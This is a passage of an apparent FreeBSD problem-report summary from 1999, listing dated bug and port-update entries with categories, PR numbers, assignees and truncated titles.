[1999/03/10] bin/10524 3.1-19990309-STABLE install problem o [1999/03/10] ports/10532 ports New port: lang/gpc - GNU Pascal o [1999/03/10] bin/10538 sbin/nos-tun gives wrong usage message o [1999/03/11] bin/10546 Intel Pro/100 PC card has CIS string > CI o [1999/03/11] bin/10548 More useful default ifconfig behaviour sa o [1999/03/12] gnu/10555 jraynard [PATCH] awk dumps core o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] bin/10568 obrien dhcp client receives garbage (dhclient pr o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/14] bin/10590 new option to silince confirmation but no o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10606 Probablue odd error message if LS-120 is o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/16] bin/10622 vi does not display Russian characters pr o [1999/03/16] i386/10623 DFLTPHYS in /usr/src/sys/i386/include/par o [1999/03/16] ports/10634 ports Update the hylafax port to do a client in o [1999/03/17] ports/10639 rse ports/web/wml must be upgraded and unbrok o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/17] kern/10642 exports(5) mentions KERBNFS but that's no o [1999/03/18] bin/10657 Unable to install from CDROM or DOS parti o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] docs/10664 doc Notes on 2.2.8 -> 3.1 migration o [1999/03/18] misc/10667 Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682 asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/22] kern/10728 sos WCD driver does not recognize a recovered o [1999/03/22] ports/10734 pst Update of gdb port to 4.17 o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/23] i386/10766 obsolete device name wcd is still left un o [1999/03/24] i386/10779 zp slot 0 sees 3Com 589 PCMCIA card but z o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 whois(1) client enchancements a [1999/03/26] misc/10804 billf whois(1) enhancement o [1999/03/26] ports/10806 phk Update net/scotty to 2.1.10 o [1999/03/26] kern/10812 LINT configuration MAXDSIZ/DFLDSIZ mislea o [1999/03/26] ports/10813 ports crossgo32 brokeness o [1999/03/27] bin/10825 daily script not executed or executed twi o [1999/03/28] docs/10840 jkh [PATCH] Add pcic double-loading bug fix t f [1999/03/28] ports/10844 ports New port: adagdb o [1999/03/29] docs/10850 doc submitting a documentation change for sed o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/30] bin/10878 host(1) dumps core o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] bin/10905 sa(8) is hard coded for 8 character user o [1999/04/01] gnu/10910 Integration of Objective C patches into g o [1999/04/02] ports/10916 ports New port: biology/molmol o [1999/04/02] bin/10923 /usr/bin/cpp is an out-of-date wrapper fo o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/04] ports/10945 jmz X11 "sessreg" program does not update /va o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/06] bin/10992 pthread_kill() doesn't deliver signals to o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/07] i386/11006 Sysinstall silently makes FreeBSD's parti o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] ports/11029 ports Configure scripts for non ported applicat o [1999/04/08] bin/11031 [PATCH] mount and umount support for mort o [1999/04/08] bin/11032 h2ph's cpp #warning/#error directive proc o [1999/04/08] ports/11034 ports New port: www/crazywwwboardle o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048 obrien variable not initialized in fwtk-lib lead o [1999/04/09] bin/11051 ps's -U option should accept a list of us o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/12] kern/11109 ipfw.ko Makefile contains CFLAGS+= -DDIVE o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 make(1) does not work as documented with o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134 hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/14] ports/11138 jmz New version of Xevil 2.01, I created a po o [1999/04/14] bin/11141 u_long is not big enough o [1999/04/15] misc/11149 Web page entry for BAFUG is incorrect o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 o [1999/04/16] bin/11168 pw(8) usermod does not recognize -w flag o [1999/04/16] kern/11178 [PATCH] minor fix to /usr/include/sys/mbu o [1999/04/18] i386/11201 brian mktime possible bug o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/18] i386/11207 sys/i386/isa/rp.c: fixed breaking and war o [1999/04/19] kern/11222 MFS does not sync from reboot syscall o [1999/04/20] kern/11235 Need to submit new driver o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/21] docs/11258 doc suggestion to refine npx.4 o [1999/04/22] kern/11287 rfork(RFMEM...) doesn't share LDTs set by o [1999/04/22] misc/11289 makeflp.bat suggestion: create "kernel" d o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/25] misc/11316 [PATCH] HTTP proxy support for sysinstall o [1999/04/27] ports/11353 asami Feature additions to bsd.port.mk. o [1999/04/27] ports/11354 jmz Port fix: x11/XFree86 o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/28] bin/11370 more segfaults if you give it a real file o [1999/04/29] misc/11383 $Id$ missing in some files in etc [PATCH] o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] ports/11388 torstenb patch for ircII so /window create works o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11410 code typo in ad1848.c: the != operator ha o [1999/04/30] kern/11411 code typo in clones.c: "if ((mpu_config = o [1999/04/30] kern/11412 code typo in ip_fil.c: missing NULL check o [1999/04/30] kern/11413 code typo in pci.c: the != operator has h o [1999/04/30] kern/11414 code typo in pcf.c: the != operator has h o [1999/04/30] kern/11415 code typo in wst.c: the != operator has h o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/04/30] ports/11421 jfitz upgrade p5-Date-Manip 5.33 -> 5.34 o [1999/05/01] ports/11430 se incorrect int type causes floating point o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/02] ports/11460 erich Update to the xlispstat port o [1999/05/03] misc/11478 Non-functional AFS support in KerberosIV o [1999/05/04] ports/11504 chuckr Update ports math/octave o [1999/05/05] ports/11510 nik new version of www/sitecopy (0.6.0) o [1999/05/05] kern/11516 NetGear 10/100 Ethernet 21140-based Ether o [1999/05/05] kern/11517 ../../kern/kern_ntptime.c:533: warning: i o [1999/05/05] kern/11518 ../../pci/if_tx.c:1376: warning: no previ o [1999/05/05] kern/11519 dead code in ncr driver o [1999/05/06] bin/11552 sendmail local delivery (mail.local) can' o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/07] misc/11569 Automatically run fsck when the file syst o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611 billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/10] conf/11626 /var/log/kerberos is rotated o [1999/05/10] bin/11637 build of kdump fails o [1999/05/11] ports/11652 ports New port: net/dictd o [1999/05/11] misc/11653 obrien patch to allow DHCP configuration of inte o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] i386/11674 can't do make imake build or anything sin o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] ports/11743 torstenb inn-2.2 (nonfatal) premature stop of buil o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] ports/11786 kuriyama gnupg-0.9.6 port does not install o [1999/05/19] misc/11788 booting problems o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/20] misc/11812 ftp5.freebsd.org can't find giflib-3.0 an o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] ports/11820 asami bsd.port.subdir.mk does not define the `m o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/22] ports/11840 asami Feature fixup: bsd.port.mk o [1999/05/24] ports/11879 ports dclock's "-miltime" option and "*miltime" o [1999/05/24] kern/11881 when a dummynet pipe is encountered it st o [1999/05/25] misc/11890 make world creates /lkm directory o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/27] conf/11905 sysinstall desktop changing inconvenience o [1999/05/28] bin/11914 makewhatis during installworld uses /usr/ o [1999/05/28] i386/11920 FBSD 3.2 upgrade claims not to upgrade /u o [1999/05/28] i386/11921 /usr/X11R6/lib/aout libraries screwed up o [1999/05/29] conf/11925 rc.conf cosmetic naming inconsistencies o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] ports/11963 ports should update the ocaml-tk module and ins o [1999/05/31] ports/11964 jmacd lang/STk port needs to be updated to STk- o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] docs/11978 doc timed(8) manpage does not define '-F' swi o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/01] kern/11982 Three cleanup fixes for uthreads o [1999/06/02] conf/11989 pppd(8) output misplaced o [1999/06/02] bin/11997 Enhancement for lpr o [1999/06/02] ports/12001 ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] misc/12013 patch for 12012 o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/04] conf/12026 /etc/rc.diskless1 refrences non-existant o [1999/06/05] misc/12044 having tcl.h in /usr/local/include:/usr/i o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/06] kern/12053 fixes a few aio bugs, makes socket io bet o [1999/06/06] ports/12056 ache [PATCH] hpack install files always in /us o [1999/06/06] ports/12057 markm Perl5 library builds do not honour PREFIX o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/13] ports/12188 ports New port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195 ports New port: pgpenvelope o [1999/06/14] ports/12204 andy Update port: graphics/EZWGL o [1999/06/14] misc/12209 termcap: "xterm" entry defines bogus capa o [1999/06/15] misc/12228 /etc/security don't search in all the fil o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] kern/12241 jkh Req: GENERIC includes bpf device o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12255 BIND 8.1.2 compilation error in IPv6 capa o [1999/06/17] bin/12263 hoek "more" problems with long filenames f [1999/06/17] misc/12268 n_hibma weekly/catman will not work o [1999/06/18] ports/12271 ports fix pkg_add with error message and add ne o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325 asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc o [1999/06/22] conf/12342 /etc/hosts.allow must use numerical IP ad o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only o [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/23] ports/12366 billf finish the port for misc/mprime o [1999/06/23] ports/12368 ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/23] bin/12375 mv(1) cannot inherit the file flags. o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/26] ports/12403 ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406 ports New port for the LAM implementation of th o [1999/06/27] kern/12409 add some more chipset models by NVidia to o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/06/29] ports/12456 chuckr graphics/xpdf: small fixes o [1999/06/30] bin/12461 it's handy to be able to send syslog mess o [1999/06/30] bin/12467 wollman ac(8) does not accept input from stdin o [1999/07/01] kern/12475 ctrl,shift,alt keys can be used as alock o [1999/07/01] bin/12477 New fortune o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/02] ports/12490 ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492 ports port misc/diction should be moved to text o [1999/07/03] kern/12495 3.1 install fails to detect Toshiba CDROM o [1999/07/03] ports/12503 ports New port: Willows toolkit (developers rel o [1999/07/04] ports/12515 jfitz p5-Apache/scripts/install_httpd needs fix o [1999/07/05] ports/12518 ports New port: ifmail-os-2.14.7 o [1999/07/05] ports/12522 ports New port: cos o [1999/07/05] ports/12523 ports New port: jdbcpool o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] ports/12530 peter squid22 port with --enable-ipf-transparen o [1999/07/06] ports/12536 ports New port: lang/cu-prolog o [1999/07/06] kern/12543 [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/07] ports/12548 asami New 'fecth-recursive(-list)' targets in p o [1999/07/07] ports/12549 ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571 ports Xfig port doesn't have Ghostscript suppor o [1999/07/11] kern/12594 wollman wrong sysctl descriptions f [1999/07/11] ports/12596 torstenb pidentd is unstable in 3.2 and 4.0 o [1999/07/11] ports/12604 peter New port version: transproxy 1.0 o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr s [1999/07/12] bin/12611 sheldonh /usr/bin/jot crashes with floating point o [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/12] ports/12618 ache poor trouble reporting by qpopper's pop_i o [1999/07/13] ports/12624 ports New version of mxv which also works with o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] ports/12654 pst gnats port failes on "make install" o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/15] ports/12656 ports New port: gnujsp o [1999/07/16] ports/12661 cpiazza new port: riva-glx (3d hardware accelerat o [1999/07/16] ports/12666 andy New port: kcd-4.7.10 o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/16] ports/12674 nik textproc/docproj port has an invalid depe o [1999/07/16] ports/12675 chuckr [PATCH] textproc/sp port installs config. o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/18] ports/12699 ports New port: gnofin-0.5.10 o [1999/07/18] ports/12700 jmz Errors in mtools.conf file o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] ports/12721 brian Leafnode 1.9.4 has enhancements and bug f o [1999/07/20] ports/12722 ports New port: AT&T's DjVu library for scanned o [1999/07/20] kern/12723 Unnecessary use of magic numbers in F_[SG o [1999/07/20] ports/12725 ache Doing a 'make install' for bash2 gets ins o [1999/07/20] ports/12726 jfitz p5-Pg fixed o [1999/07/21] ports/12735 ports New port: lang/ghc o [1999/07/21] ports/12737 jfitz regex for checking load avergaes is wrong o [1999/07/21] ports/12739 ports New port: AT&T's DjVu Netscape plug-in o [1999/07/22] ports/12761 wosch sysutils/stat doesn't terminate buffer an o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/22] bin/12767 doc Expand /etc/ttys manpage o [1999/07/22] bin/12768 billf Compilation warning for fortune.c o [1999/07/22] kern/12770 mount_msdos causes panic: kmem_malloc(134 o [1999/07/23] misc/12776 Add PAM hooks to rlogind and rshd f [1999/07/23] bin/12782 sheldonh xntpd doesn't handle interface aliases pr o [1999/07/24] ports/12787 obrien port of GNU helloworld o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy o [1999/07/24] ports/12790 kris Update Port: maildrop s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] kern/12803 obrien patch to make xe driver's noise configura o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/26] ports/12817 kris gdict fix for conflict with dict port o [1999/07/27] kern/12833 Support for TI1225 PCI to CardBus Bridge o [1999/07/27] ports/12835 andy New port: libcgic-1.06 o [1999/07/27] ports/12836 jfitz p5-Apache port mod_perl part is out of da o [1999/07/28] ports/12851 jmz XFree86 needs change for pc98 o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused o [1999/07/28] ports/12864 ache update: less-340 a [1999/07/28] bin/12866 sheldonh [PATCH] RFE for /bin/ls to add a -n optio o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/30] ports/12890 obrien nmap seems to break under certain conditi o [1999/07/30] ports/12891 torstenb Please update converters/recode to 3.5 o [1999/07/31] kern/12896 Incorrect CPU model display at boot time o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/07/31] ports/12899 ports New port: wmnet-new o [1999/07/31] ports/12903 ports new ports/database/p5-* o [1999/07/31] ports/12904 taoka new ports/devel/gperf o [1999/08/01] ports/12915 ports Add elm 2.5 to ports o [1999/08/01] ports/12916 wosch Update Checkbot to 1.56 o [1999/08/02] docs/12933 n_hibma sio.4 misses description of 0x0080 flag o [1999/08/02] ports/12934 ache procmail 3.13 port doesn't have "install- o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] ports/12941 ports New port: Hyperlatex (print/hyperlatex) o [1999/08/03] bin/12942 m4: len(`') returns `' a [1999/08/03] kern/12943 dg fxp driver not completely compatible with o [1999/08/03] bin/12946 top(1) gives incorrect delay default o [1999/08/04] docs/12951 doc missing link to japanese mailing list gui o [1999/08/04] ports/12952 asami make _PORT_USE touch cookies by variable, o [1999/08/04] ports/12953 ejc tcl81-thread breaks package naming conven o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe o [1999/08/04] bin/12960 des basename(3) and dirname(3) o [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/04] docs/12969 doc Informacion incorrecta para versiones Fre o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] misc/12992 sector size independent patch for msdosfs o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/05] docs/12994 hoek Update to getopt.3 to agree with style.9 o [1999/08/06] bin/13000 vi core dumped o [1999/08/06] ports/13006 erich update emulators/x48 to 0.4.1d o [1999/08/07] ports/13012 kris update port: xwhois-0.3.6 to 0.3.7 o [1999/08/07] conf/13016 Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] docs/13034 doc incorrect (old/obsolete) manpage for name o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13070 sheldonh line(1) as required by Unix 98 o [1999/08/11] bin/13071 sheldonh link(1) as required by Unix 98 o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] bin/13074 sheldonh unlink(1) as required by Unix 98 o [1999/08/11] docs/13079 mpp new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/11] misc/13089 sysinstall repeatedly installs a distribu a [1999/08/12] bin/13091 sheldonh [PATCH] pdksh-derived replacement for tes o [1999/08/12] bin/13092 des Fetch doesn't default to the correct http o [1999/08/12] bin/13108 authunix_create_default includes egid twi o [1999/08/13] docs/13116 doc typo in ms(7) o [1999/08/13] misc/13117 CVS repo src/lib/libc_r/uthread incorrect o [1999/08/13] ports/13124 ports New port: LinAlg; request for local hosti o [1999/08/13] bin/13128 billf pkg_delete doesn't handle absolute pathna o [1999/08/13] ports/13129 torstenb Postfix Port Ignores MANPREFIX o [1999/08/13] ports/13133 chuckr update: xpdf 0.90 o [1999/08/14] bin/13143 billf changing mount flags on a mounted filesys o [1999/08/15] misc/13152 systemwide username too short (currently o [1999/08/15] docs/13153 doc fdc.4 has typo (a line which begin with ' o [1999/08/15] kern/13161 alfred mounting on top of a mounted file system o [1999/08/15] kern/13164 kthread_exit stops, but doesn't release p o [1999/08/15] ports/13167 torstenb [PATCH] security/ssh package keygen fails o [1999/08/15] i386/13171 "config" not quite right for kernel not n o [1999/08/16] ports/13173 andy New port: yiff-0.33 o [1999/08/16] kern/13176 cannot set _default_ colours for console o [1999/08/16] misc/13185 "tengo problemas con el pop3" o [1999/08/17] ports/13191 andy New port: fire-1.0 o [1999/08/17] docs/13197 mpp aio_*(2) not installing by make installwo o [1999/08/17] ports/13201 ports New port: xmess (X11 emulator for game co o [1999/08/17] kern/13209 IPFILTER_DEFAULT_BLOCK not in /usr/src/sy o [1999/08/17] docs/13211 chris [LIST] Some man pages has references to n o [1999/08/17] kern/13215 ALPS GlidePoint in Sony Z505 not recogniz o [1999/08/18] docs/13218 mpp Many manpages still not conformed mdoc(7) o [1999/08/18] kern/13220 mkdep: compile failed - ../../pci/if_de.c o [1999/08/18] docs/13225 doc fpa.4 seems to be i386 specific and shoul o [1999/08/18] kern/13232 panic("rtfree"); when sending bootp reque s [1999/08/18] bin/13235 mpp allow preprocessing with tbl(1) for nroff o [1999/08/18] bin/13236 billf Patch for whois to use UK Nominet databas o [1999/08/18] conf/13249 sysinstall not installing from a local ft o [1999/08/18] ports/13251 andy New port: founts-11 s [1999/08/19] kern/13252 niced jobs don't behave really nice o [1999/08/19] bin/13254 yp_all error messages have wrong text o [1999/08/20] misc/13266 Removal of #defines and addition of const o [1999/08/20] ports/13267 andy New port: glasteroids-1.0 o [1999/08/20] misc/13275 inter.phone has old codes for Guatemala o [1999/08/20] bin/13278 rogue: killed by fire corrupts score file o [1999/08/20] kern/13281 wollman Support for VLANs missing? o [1999/08/20] misc/13282 partial compliance of dlopen to the Singl o [1999/08/21] ports/13291 andy New port: xap-xwf-0.7.8 o [1999/08/21] bin/13309 Fixes to nos-tun s [1999/08/21] kern/13314 sheldonh can't compile when softupdates + debug. o [1999/08/22] misc/13326 additional timeval interfaces for 4.0. o [1999/09/06] ports/13606 ache Apache's suEXEC wrapper doesn't enforce u o [1999/09/07] conf/13609 Some deamons not replacable at boot time o [1999/09/07] ports/13614 ports xdm and wdm do not set environment variab o [1999/09/07] ports/13619 jfitz www/p5-libwww incorrect dependency orderi o [1999/09/07] ports/13633 ports Better location for samba's private direc o [1999/09/08] bin/13649 billf Enhancement to PKG_INSTALL tools (4.0-CUR o [1999/09/08] ports/13650 asami Port Conflict Checking for bsd.port.mk o [1999/09/09] docs/13657 doc mklocale(1) man errors o [1999/09/09] kern/13666 buggy filesystems are built as modules o [1999/09/09] ports/13677 ports Misc. Ports fix ups. o [1999/09/10] bin/13692 umount(8) does not unmount filesystems wi o [1999/09/11] bin/13697 pstat(8) command line option '-w' not fun o [1999/09/11] misc/13698 Here is: a euro character for syscons & i o [1999/09/11] ports/13705 jfitz Update port: www/p5-Apache o [1999/09/12] i386/13706 FreeBSD identifies all 80486 processors a o [1999/09/12] ports/13713 jseger upgrade gnugo port to 2.4 o [1999/09/13] ports/13716 andreas New port: net/tac_plus.F4.0.2 o [1999/09/13] ports/13723 ports Update port: russian/apache to 1.3.9 o [1999/09/13] kern/13725 sheldonh Comment in LINT: extracting config file f o [1999/09/13] ports/13734 billf ifhp-3.3.9 port o [1999/09/15] bin/13758 [PATCH] adding current download throughpu o [1999/09/15] bin/13759 Makefile for sendmail configurations o [1999/09/15] kern/13764 yokota [PATCH] Stop syscons from flushing histor o [1999/09/15] docs/13767 doc rstat_svc(8) manpage present, but /etc/rs o [1999/09/15] conf/13769 NATD is not compatible with the "simple" o [1999/09/15] kern/13770 phk Almost clone update for kernel ppp implem o [1999/09/16] bin/13781 [PATCH] allow tcpdump to print packet con o [1999/09/17] ports/13786 ports New port: GHC-4.04 o [1999/09/17] docs/13792 doc Difficult to find documentation of "secur o [1999/09/17] bin/13799 [patch] teach vidcontrol there are up to o [1999/09/17] ports/13800 se Patches attached for kdelibs-1.1.1, fix ' o [1999/09/18] misc/13807 data-sensitivity buglet in 'make release' o [1999/09/18] ports/13808 ports linux-rvplayer port improved a'la netscap f [1999/09/19] docs/13813 phantom Commercial Vendors: NetWolves Corporation o [1999/09/19] docs/13815 doc Out-of-date FAQ entries o [1999/09/19] ports/13823 wosch stat port not formatting device node o [1999/09/19] ports/13832 se kdebase11 doesn't DTRT when PREFIX is set o [1999/09/19] ports/13833 se make PREFIX=/foo/bar/quux broken for kdeu o [1999/09/19] ports/13834 se make PREFIX= broken in kdesupport11 o [1999/09/19] ports/13835 se Fix 'make PREFIX=...' for kdegames11 o [1999/09/19] ports/13840 se 'make PREFIX' fails for kdenetwork11 s [1999/09/19] kern/13841 hm ISDN i4b does not hang up o [1999/09/19] ports/13842 se 'make PREFIX' fails for kdemultimedia s [1999/09/19] kern/13843 ken da driver does not support 'CDIOCEJECT' i o [1999/09/19] kern/13846 [PATCH] remove some kernel compile warnin o [1999/09/20] kern/13850 detect more VGA cards o [1999/09/20] conf/13863 obrien dhclient-script doesn't update route if n o [1999/09/20] misc/13867 Cannot install source of X11 s [1999/09/21] bin/13869 sheldonh man program saves multiple cached copies o [1999/09/21] bin/13870 "ps tpt" produces "ps: /dev/ttypT: No suc o [1999/09/21] docs/13878 doc No isnanf(3) documentation o [1999/09/21] bin/13882 mount -p is missing the quota options o [1999/09/21] kern/13883 Can't have a MFS filesystem > 512MB o [1999/09/21] ports/13887 taoka New port (fmirror) o [1999/09/22] docs/13891 doc Submission for commerical vendor page o [1999/09/22] misc/13895 nonexistent words in /usr/share/dict/web2 o [1999/09/22] ports/13898 obrien New port: misc/dictd o [1999/09/22] bin/13901 strptime breaks when handling some numeri o [1999/09/22] conf/13907 dummynet.4 correction, rc addition of s [1999/09/22] bin/13909 sheldonh /etc/security problems: IPFIREWALL and pa o [1999/09/22] docs/13914 doc global(1) manpage does not explain -v opt o [1999/09/23] conf/13916 mpp man outputs footer only page as first pag o [1999/09/23] conf/13918 Termcap entries for VESA modes missing o [1999/09/23] gnu/13921 awk -v var=val coredump o [1999/09/23] kern/13924 sb/snd driver broken under 4.0-19990918-C o [1999/09/23] ports/13927 billf textproc/htdig updated f [1999/09/24] gnu/13935 ru FreeBSD uses an obsolete version of grep o [1999/09/24] i386/13936 No clear indictaion of how much space to o [1999/09/25] docs/13946 doc Various updates to handbook/kernelconfig/ o [1999/09/25] docs/13949 jim Various fixes to faq/book.sgml o [1999/09/25] docs/13950 doc webpage idea o [1999/09/25] ports/13952 se update emulators/wine to 990923 (supersed o [1999/09/25] docs/13953 doc BRU Product Update o [1999/09/25] docs/13954 doc Listing on Consulting Page: Collective Te o [1999/09/25] docs/13956 doc commercial vendor: JAV-Associates Consult o [1999/09/25] docs/13957 doc Correction to your website for ZNYX Corp. o [1999/09/25] docs/13958 doc consultant page submission: Atlas Softwar o [1999/09/25] docs/13959 doc cgi 